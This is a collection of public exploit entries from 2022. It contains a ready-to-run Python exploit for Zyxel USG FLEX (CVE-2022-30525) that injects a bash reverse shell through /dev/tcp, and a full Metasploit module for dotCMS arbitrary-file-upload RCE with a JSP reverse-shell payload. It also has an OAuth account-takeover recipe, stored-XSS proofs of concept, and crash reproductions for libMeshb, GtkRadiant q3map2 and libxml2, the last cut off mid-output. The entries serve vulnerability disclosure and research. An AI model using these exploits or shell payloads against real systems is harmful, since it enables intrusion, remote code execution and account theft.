<pre><code># Exploit Title: Microweber CMS 1.2.15 - Account Takeover<br /># Date: 2022-05-09<br /># Exploit Author: Manojkumar J<br /># Vendor Homepage: https://github.com/microweber/microweber<br /># Software Link: https://github.com/microweber/microweber/releases/tag/v1.2.15<br /># Version: <=1.2.15<br /># Tested on: Windows10<br /># CVE : CVE-2022-1631<br /><br /># Description:<br /><br />Microweber Drag and Drop Website Builder E-commerce CMS v1.2.15 Oauth<br />Misconfiguration Leads To Account Takeover.<br /><br /># Steps to exploit:<br /><br />1. Create an account with the victim's email address.<br /><br />Register endpoint: https://target-website.com/register#<br /><br />2. When the victim tries to login with default Oauth providers like Google,<br />Github, Microsoft, Twitter, Linkedin, Telegram or Facebook etc(auth login)<br />with that same e-mail id that we created account before, via this way we<br />can take over the victim's account with the recently created login<br />credentials.<br /><br /></code></pre>
<pre><code># Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection<br /># Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"<br /># Date: May 18th 2022<br /># Exploit Author: Valentin Lobstein<br /># Vendor Homepage: https://www.zyxel.com<br /># Version: ZLD5.00 thru ZLD5.21<br /># Tested on: Linux<br /># CVE: CVE-2022-30525<br /><br /><br />from requests.packages.urllib3.exceptions import InsecureRequestWarning<br />import sys<br />import json<br />import base64<br />import requests<br />import argparse<br /><br /><br />parser = argparse.ArgumentParser(<br /> prog="CVE-2022-30525.py",<br /> description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",<br />)<br />parser.add_argument("-u", dest="url", help="Specify target URL")<br />parser.add_argument("-r", dest="host", help="Specify Remote host")<br />parser.add_argument("-p", dest="port", help="Specify Remote port")<br /><br />args = parser.parse_args()<br /><br />banner = (<br /> "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"<br /> "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"<br /> "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"<br /> "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"<br /> "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"<br /> "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"<br /> "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"<br /> "biA6KSApCg=="<br />)<br /><br /><br />def main():<br /><br /> print("\n" + base64.b64decode(banner).decode("utf-8"))<br /><br /> if None in vars(args).values():<br /> print(f"[!] Please enter all parameters !")<br /> parser.print_help()<br /> sys.exit()<br /><br /> if "http" not in args.url:<br /> args.url = "https://" + args.url<br /> args.url += "/ztp/cgi-bin/handler"<br /> exploit(args.url, args.host, args.port)<br /><br /><br />def exploit(url, host, port):<br /> headers = {<br /> "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",<br /> "Content-Type": "application/json",<br /> }<br /><br /> data = {<br /> "command": "setWanPortSt",<br /> "proto": "dhcp",<br /> "port": "4",<br /> "vlan_tagged": "1",<br /> "vlanid": "5",<br /> "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',<br /> "data": "hi",<br /> }<br /> requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br /> print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")<br /><br /> try:<br /> response = requests.post(<br /> url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5<br /> )<br /> except (KeyboardInterrupt, requests.exceptions.Timeout):<br /> print("[!] Bye Bye hekcer !")<br /> sys.exit(1)<br /> finally:<br /><br /> try:<br /> print("[!] Can't exploit the target ! Code :", response.status_code)<br /><br /> except:<br /> print("[!] Enjoy your shell !!!")<br /><br /><br />if __name__ == "__main__":<br /> main()<br /><br /></code></pre>
<pre><code>=====<br />Intro<br />=====<br /><br />libMeshb is a library which supports moving between data types for the Gamma Mesh Format. A buffer overflow was found when parsing the MESH format and specially crafted .mesh files could allow for arbitrary code execution.<br /><br />=====<br />Repro<br />=====<br /><br />No magic bytes or valid header necessary as the bug appears to be an unbounded fscanf() processing mesh headers.<br /><br />echo -ne `perl -e 'print "B" x 2176'` > test.mesh<br /><br />========<br />Debugger<br />========<br /><br />(gdb) r test.mesh /tmp/empty.mesh<br />Starting program: mesh2poly test.mesh /tmp/empty.mesh<br /><br />*** stack smashing detected ***: terminated<br /><br />Program received signal SIGABRT, Aborted.<br />__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50<br /><br />(gdb) bt<br />#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50<br />#1 0x00007ffff7ddb859 in __GI_abort () at abort.c:79<br />#2 0x00007ffff7e463ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7f7007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155<br />#3 0x00007ffff7ee8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7f70064 "stack smashing detected") at fortify_fail.c:26<br />#4 0x00007ffff7ee8b16 in __stack_chk_fail () at stack_chk_fail.c:24<br />#5 0x000055555555b5d2 in GmfOpenMesh ()<br />#6 0x4242424242424242 in ?? ()<br />#7 0x0000000000000000 in ?? ()<br /><br />(gdb) exploitable<br />Description: Stack buffer overflow<br />Short description: StackBufferOverflow (6/22)<br />Hash: ea307ff89c1110d6e6c6f565bfc6a9ce.350b4f5ab2938b2eb4fa0a598f3508e1<br />Exploitability Classification: EXPLOITABLE<br />Explanation: The target stopped while handling a signal that was generated by libc due to detection of a stack buffer overflow. Stack buffer overflows are generally considered exploitable.<br />Other tags: PossibleStackCorruption (7/22), AbortSignal (20/22)<br /><br />This also affects the python wrapper library pymeshb.<br /><br />>>> import pymeshb<br />>>> pymeshb.read('test.mesh')<br />*** stack smashing detected ***: terminated<br />Aborted (core dumped)<br /><br />===<br />Fix<br />===<br /><br />libMeshb v7.62<br /><br />- https://github.com/LoicMarechal/libMeshb/commit/8cd68c54e0647c0030ae4506a225ad4a2655c316<br /><br /></code></pre>
<pre><code># Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS)<br /><br /> <br />#### Exploit Title: Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS)<br />#### Exploit Author: webraybtl@webray.com.cn inc<br />#### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html<br />#### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code<br />#### Version: Product Show Room Site 1.0<br />#### Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql<br /><br />#### Description<br />Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.<br /><br />#### Payload used:<br />`<script>alert(111)</script>`<br /><br />#### Proof of Concept<br /><br />1. Login the CMS. <br />Default Admin Access<br />Username: admin<br />Password: admin123<br /><br />1. Open Page http://172.24.5.107/psrs/admin/?page=system_info/contact_info and click View button<br /><br />2. Put XSS payload (`<script>alert(111)</script>`) in the Telephone box and click on Update to publish the page<br /> ![image](https://user-images.githubusercontent.com/60683449/171591851-2068eea2-b789-464f-8afb-9f6b6f8eaedd.png)<br /> <br />3. Open http://172.24.5.107/psrs/?p=contact,Viewing the successfully published page,We can see the alert.<br /> ![image](https://user-images.githubusercontent.com/60683449/171591881-2962a429-f2de-4979-8e27-6fdd8f62c61c.png)<br /><br /><br /><br /><br />-------<br /><br /><br /># Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)<br /><br /> <br />#### Exploit Title: Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)<br />#### Exploit Author: webraybtl@webray.com.cn inc<br />#### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html<br />#### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code<br />#### Version: Product Show Room Site 1.0<br />#### Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql<br /><br />#### Description<br />Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.<br /><br />#### Payload used:<br />`<script>alert(111)</script>`<br /><br />#### Proof of Concept<br /><br />1. Login the CMS. <br />Default Admin Access<br />Username: admin<br />Password: admin123<br /><br />1. Open Page http://172.24.5.107/psrs/?p=contact <br /><br />2. Put XSS payload (`<script>alert(111)</script>`) in the Message box and click on Send Message to publish the page<br /> ![image](https://user-images.githubusercontent.com/60683449/171591580-cc3ca01c-9e37-4e05-9351-4b9d7c7749df.png)<br /> ![image](https://user-images.githubusercontent.com/60683449/171591599-be5e8d7f-1d95-43ad-875a-9884f7052fa6.png)<br /><br /> <br />4. Open http://172.24.5.107/psrs/admin/?page=inquiries,Viewing the Top 1 of Inquiries page,We can see the alert.<br /> ![image](https://user-images.githubusercontent.com/60683449/171591660-c12ce9ac-aab1-45e9-b99f-7514dd28f698.png)<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'DotCMS RCE via Arbitrary File Upload.',<br /> 'Description' => %q{<br /> When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the<br /> file down in a temp directory. In the case of this vulnerability, dotCMS does not sanitize the filename<br /> passed in via the multipart request header and thus does not sanitize the temp file's name. This allows a<br /> specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content) that get<br /> written outside of the dotCMS temp directory. In the case of this exploit, an attacker can upload a special<br /> .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.<br /> },<br /> 'Author' => [<br /> 'Shubham Shah', # Discovery and analysis<br /> 'Hussein Daher', # Discovery and analysis<br /> 'jheysel-r7' # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2022-26352'],<br /> ['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']<br /> ],<br /> 'Privileged' => false,<br /> 'Platform' => %w[linux win],<br /> 'Targets' => [<br /> [<br /> 'Java Linux',<br /> {<br /> 'Arch' => ARCH_JAVA,<br /> 'Platform' => 'linux'<br /> }<br /> ],<br /> [<br /> 'Java Windows',<br /> {<br /> 'Arch' => ARCH_JAVA,<br /> 'Platform' => 'win'<br /> }<br /> ]<br /> ],<br /> 'DisclosureDate' => '2022-05-03',<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> Opt::RPORT(8443),<br /> OptString.new('TARGETURI', [true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> def check<br /> test_content = Rex::Text.rand_text_alpha(10)<br /> test_file = "#{test_content}.jsp"<br /> test_path = "../../#{test_file}"<br /> uuid = Faker::Internet.uuid<br /><br /> jsp = <<~EOS<br /> <%@ page import=\"java.io.File\" %><br /> <%<br /> File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");<br /> jsp.delete();<br /> %><br /> #{uuid}<br /> EOS<br /><br /> vars_form_data = [<br /> {<br /> 'name' => 'name',<br /> 'data' => jsp,<br /> 'encoding' => nil,<br /> 'filename' => test_path,<br /> 'mime_type' => 'text/plain'<br /> }<br /> ]<br /><br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/api/content/'),<br /> 'vars_form_data' => vars_form_data<br /> )<br /><br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, test_file.to_s)<br /> )<br /><br /> if res && res.body.include?(uuid)<br /> return Exploit::CheckCode::Vulnerable<br /> end<br /><br /> Exploit::CheckCode::Safe<br /> end<br /><br /> def write_jsp_payload<br /> jsp_path = "../../#{jsp_filename}"<br /> print_status('Writing JSP payload')<br /> vars_form_data = [<br /> {<br /> 'name' => 'name',<br /> 'data' => payload.encoded,<br /> 'encoding' => nil,<br /> 'filename' => jsp_path,<br /> 'mime_type' => 'text/plain'<br /> }<br /> ]<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/api/content/'),<br /> 'vars_form_data' => vars_form_data<br /> )<br /><br /> unless res&.code == 500<br /> fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')<br /> end<br /><br /> register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")<br /> print_good('Successfully wrote JSP payload')<br /> end<br /><br /> def execute_jsp_payload<br /> jsp_uri = normalize_uri(target_uri.path, jsp_filename)<br /> print_status('Executing JSP payload')<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => jsp_uri<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')<br /> end<br /> print_good('Successfully executed JSP payload')<br /> end<br /><br /> def exploit<br /> write_jsp_payload<br /> execute_jsp_payload<br /> end<br /><br /> def jsp_filename<br /> @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"<br /> end<br />end<br /></code></pre>
<pre><code>=====<br />Intro<br />=====<br /><br />GtkRadiant is a cross-platform level editor software for idtech game engines such as Quake. It comes with data authoring tools and a BSP map compiler called q3map2 which parses MAP files. The code has been around for a long time and uses unsafe string copy and format functions. A buffer overflow was discovered in the map compiler that occurs when parsing malformed MAP files with large shader image names that could allow for arbitrary code execution.<br /><br />Various projects also use or have forked the q2map2 code into their projects such as DeepMind Lab and other 3D or game related codebases.<br /><br />=====<br />Repro<br />=====<br /><br />$ echo -ne "\x2f\x2f\x0a\x7b\x0a\x61\x20\x70\x20\x73\x20\x30\x0a\x7b\x0a\x28\x20\x34\x20\x32\x20\x34\x20\x29\x20\x28\x20\x34\x20\x38\x20\x34\x20\x29\x20\x28\x20\x34\x20\x34\x20\x34\x20\x29\x20"`perl -e 'print "B" x 55'`"\x20\x35\x20\x30\x20\x34\x20\x30\x20\x7d\x0a" > crash_sprintf.map<br /><br />$ xxd crash_sprintf.map <br />00000000: 2f2f 0a7b 0a61 2070 2073 2030 0a7b 0a28 //.{.a p s 0.{.(<br />00000010: 2034 2032 2034 2029 2028 2034 2038 2034 4 2 4 ) ( 4 8 4<br />00000020: 2029 2028 2034 2034 2034 2029 2042 4242 ) ( 4 4 4 ) BBB<br />00000030: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB<br />00000040: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB<br />00000050: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB<br />00000060: 4242 4242 2035 2030 2034 2030 207d 0a BBBB 5 0 4 0 }.<br /><br />$ echo -ne "\x2f\x2f\x0a\x7b\x0a\x61\x20\x70\x20\x73\x20\x30\x0a\x7b\x0a\x28\x20\x34\x20\x32\x20\x34\x20\x29\x20\x28\x20\x34\x20\x38\x20\x34\x20\x29\x20\x28\x20\x34\x20\x34\x20\x34\x20\x29\x20"`perl -e 'print "B" x 64'`"\x20\x35\x20\x30\x20\x34\x20\x30\x20\x7d\x0a" > crash_strcpy.map<br /><br />$ xxd crash_strcpy.map <br />00000000: 2f2f 0a7b 0a61 2070 2073 2030 0a7b 0a28 //.{.a p s 0.{.(<br />00000010: 2034 2032 2034 2029 2028 2034 2038 2034 4 2 4 ) ( 4 8 4<br />00000020: 2029 2028 2034 2034 2034 2029 2042 4242 ) ( 4 4 4 ) BBB<br />00000030: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB<br />00000040: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB<br />00000050: 4242 4242 4242 4242 4242 4242 4242 4242 BBBBBBBBBBBBBBBB<br />00000060: 4242 4242 4242 4242 4242 4242 4220 3520 BBBBBBBBBBBBB 5 <br />00000070: 3020 3420 3020 7d0a 0 4 0 }.<br /><br />========<br />Debugger<br />========<br /><br />(gdb) r crash_sprintf.map <br />Starting program: GtkRadiant/build/release/q3map2/q3map2 crash_sprintf.map<br />[Thread debugging using libthread_db enabled]<br />Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".<br />2.5.17<br />threads: 4<br />Q3Map - v1.0r (c) 1999 Id Software Inc.<br />Q3Map (ydnar) - v2.5.17<br />GtkRadiant - v1.6.6 Jan 9 2022 20:51:50<br />We're still here<br />VFS Init: /home/test/.q3a/baseq3/<br />VFS Init: GtkRadiant/build/release//baseq3/<br /><br />--- BSP ---<br />Loading crash_sprintf.map<br />entering crash_sprintf.map<br />*** buffer overflow detected ***: terminated<br /><br />Program received signal SIGABRT, Aborted.<br />__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50<br /><br />(gdb) bt<br />#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50<br />#1 0x00007ffff78bb859 in __GI_abort () at abort.c:79<br />#2 0x00007ffff79263ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7a5007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155<br />#3 0x00007ffff79c8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7a50012 "buffer overflow detected") at fortify_fail.c:26<br />#4 0x00007ffff79c73e6 in __GI___chk_fail () at chk_fail.c:28<br />#5 0x00007ffff791e1cf in _IO_str_chk_overflow (fp=<optimized out>, c=<optimized out>) at iovsprintf.c:35<br />#6 0x00007ffff792b1a4 in __GI__IO_default_xsputn (n=<optimized out>, data=<optimized out>, f=<optimized out>) at libioP.h:948<br />#7 __GI__IO_default_xsputn (f=0x7fffffffd680, data=<optimized out>, n=55) at genops.c:370<br />#8 0x00007ffff791027c in __vfprintf_internal (s=s@entry=0x7fffffffd680, format=format@entry=0x5555555dd35a "textures/%s", ap=ap@entry=0x7fffffffd7c0, mode_flags=mode_flags@entry=6)<br /> at ../libio/libioP.h:948<br />#9 0x00007ffff791e279 in __vsprintf_internal (string=0x7fffffffd930 "textures/", 'B' <repeats 54 times>, maxlen=<optimized out>, format=0x5555555dd35a "textures/%s", args=args@entry=0x7fffffffd7c0, <br /> mode_flags=6) at iovsprintf.c:95<br />#10 0x00007ffff79c6edb in ___sprintf_chk (s=<optimized out>, flag=<optimized out>, slen=<optimized out>, format=<optimized out>) at sprintf_chk.c:40<br />#11 0x00005555555a35de in ParseBrush ()<br />#12 0x00005555555a464f in LoadMapFile ()<br />#13 0x000055555559b824 in BSPMain ()<br />#14 0x000055555555f935 in main ()<br /><br />(gdb) r crash_strcpy.map <br />...<br /><br />*** buffer overflow detected ***: terminated<br /><br />Program received signal SIGABRT, Aborted.<br />__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50<br /><br />(gdb) bt<br />#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50<br />#1 0x00007ffff78bb859 in __GI_abort () at abort.c:79<br />#2 0x00007ffff79263ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7a5007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155<br />#3 0x00007ffff79c8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7a50012 "buffer overflow detected") at fortify_fail.c:26<br />#4 0x00007ffff79c73e6 in __GI___chk_fail () at chk_fail.c:28<br />#5 0x00007ffff79c6cc6 in __strcpy_chk (dest=0x7fffffffd8f0 "", src=0x5555556af480 <token> 'B' <repeats 64 times>, destlen=64) at strcpy_chk.c:30<br />#6 0x00005555555a35ab in ParseBrush ()<br />#7 0x00005555555a464f in LoadMapFile ()<br />#8 0x000055555559b824 in BSPMain ()<br />#9 0x000055555555f935 in main ()<br /></code></pre>
<pre><code>libxml2: heap-buffer-overflow in xmlBufAdd<br /><br />libxml2 is vulnerable to a heap-buffer-overflow when xmlBufAdd is called on a very large buffer:<br />```<br />int<br />xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {<br /> unsigned int needSize;<br /><br /> [..]<br /> needSize = buf->use + len + 2; (A)<br /> if (needSize > buf->size){<br /> [..]<br /> if (!xmlBufResize(buf, needSize)){<br /> xmlBufMemoryError(buf, \"growing buffer\");<br /> return XML_ERR_NO_MEMORY;<br /> }<br /> }<br /><br /> [..]<br /> memmove(&buf->content[buf->use], str, len*sizeof(xmlChar)); (C)<br /> buf->use += len;<br /> buf->content[buf->use] = 0;<br /> [..]<br />}<br />```<br /><br />For large buffers with `buf->use` and `buf->size` close to 2**32, the calculation in *A* can overflow, resulting in a small value for needSize. This will skip the reallocation of the buffer in *B* and can lead to an out-of-bounds write in *C*.<br /><br />One way to trigger this bug is to call `xmlNodeGetContent` on a node with multiple large child elements. This triggers the overflow when `xmlBufGetNodeContent` iterates through its children to add their content to the buffer. <br /><br />Exploiting this issue using static XML requires that the `XML_PARSE_HUGE` flag is used to disable hardcoded parser limits. If XSLT is used, large nodes can be created dynamically and `XML_PARSE_HUGE` isn't necessary. <br /><br />_Note: XML_PARSE_HUGE looks very brittle in general. Signed 32-bit integers are widely used as sizes/offsets throughout the codebase, a lot of the helper functions don't handle inputs larger than 4GB correctly and fuzzers won't trigger these edge cases. Maybe that flag should include a security warning? Some security critical projects like xmlsec enable it by default (https://github.com/lsh123/xmlsec/commit/3786af10953630cd2bb2b57ce31c575f025048a8) which seems risky._<br /><br />Proof of Concept: <br />XML only (we use \u2013xpath only to trigger a call to xmlNodeGetContent):<br />```<br />$ python3 -c 'print(\"<test>\<br />\" + (\"\" + \"A\"*(2**30) + \"\<br />\")*4 + \"</test>\<br />\")' > /tmp/huge.xml<br />$ ./xmllint --huge --xpath '/test[string-length() < \"4\"]' /tmp/huge.xml<br />=================================================================<br />==93182==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f0087e0780f at pc 0x00000049c682 bp 0x7ffee51cc270 sp 0x7ffee51cba38<br />WRITE of size 1073741824 at 0x7f0087e0780f thread T0<br /> #0 0x49c681 in __asan_memmove (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x49c681)<br /> #1 0x6ee851 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:908:5<br /> #2 0x595fdc in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33<br /> #3 0x5964bf in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c<br /> #4 0x669c37 in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16<br /> #5 0x669c37 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8933:16<br /> #6 0x68de92 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17<br /> #7 0x68b15e in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13020:22<br /> #8 0x68a808 in xmlXPathCompOpEvalToBoolean /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13599:6<br /> #9 0x696974 in xmlXPathNodeSetFilter /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:11674:15<br /> #10 0x692b36 in xmlXPathNodeCollectAndTest /usr/local/google/home/fwilhelm/code/libxml2/xpath.c<br /> #11 0x68c6ed in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13115:26<br /> #12 0x68b61f in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26<br /> #13 0x679516 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2<br /> #14 0x679b8d in xmlXPathEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14473:5<br /> #15 0x4d6858 in doXPathQuery /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2157:11<br /> #16 0x4d6858 in parseAndPrintFile /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2472:9<br /> #17 0x4d1bd8 in main /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:3817:7<br /> #18 0x7f02a712c7ec in __libc_start_main csu/../csu/libc-start.c:332:16<br /> #19 0x420609 in _start (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x420609)<br /><br />0x7f0087e0780f is located 0 bytes to the right of 3221225487-byte region [0x7effc7e07800,0x7f0087e0780f)<br />allocated by thread T0 here:<br /> #0 0x49d0b3 in __interceptor_realloc (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x49d0b3)<br /> #1 0x6eddb3 in xmlBufResize /usr/local/google/home/fwilhelm/code/libxml2/buf.c:829:26<br /> #2 0x6ee7f8 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:902:14<br /> #3 0x595fdc in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33<br /> #4 0x5964bf in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c<br /> #5 0x669c37 in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16<br /> #6 0x669c37 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8933:16<br /> #7 0x68de92 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17<br /> #8 0x68b15e in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13020:22<br /> #9 0x68a808 in xmlXPathCompOpEvalToBoolean /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13599:6<br /> #10 0x696974 in xmlXPathNodeSetFilter /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:11674:15<br /> #11 0x692b36 in xmlXPathNodeCollectAndTest /usr/local/google/home/fwilhelm/code/libxml2/xpath.c<br /> #12 0x68c6ed in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13115:26<br /> #13 0x68b61f in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26<br /> #14 0x679516 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2<br /> #15 0x679b8d in xmlXPathEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14473:5<br /> #16 0x4d6858 in doXPathQuery /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2157:11<br /> #17 0x4d6858 in parseAndPrintFile /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2472:9<br /> #18 0x4d1bd8 in main /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:3817:7<br /> #19 0x7f02a712c7ec in __libc_start_main csu/../csu/libc-start.c:332:16<br /><br />SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x49c681) in __asan_memmove<br />Shadow bytes around the buggy address:<br /> 0x0fe090fb8eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0fe090fb8ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0fe090fb8ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0fe090fb8ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0fe090fb8ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />=>0x0fe090fb8f00: 00[07]fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe090fb8f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe090fb8f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe090fb8f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe090fb8f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe090fb8f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br />Shadow 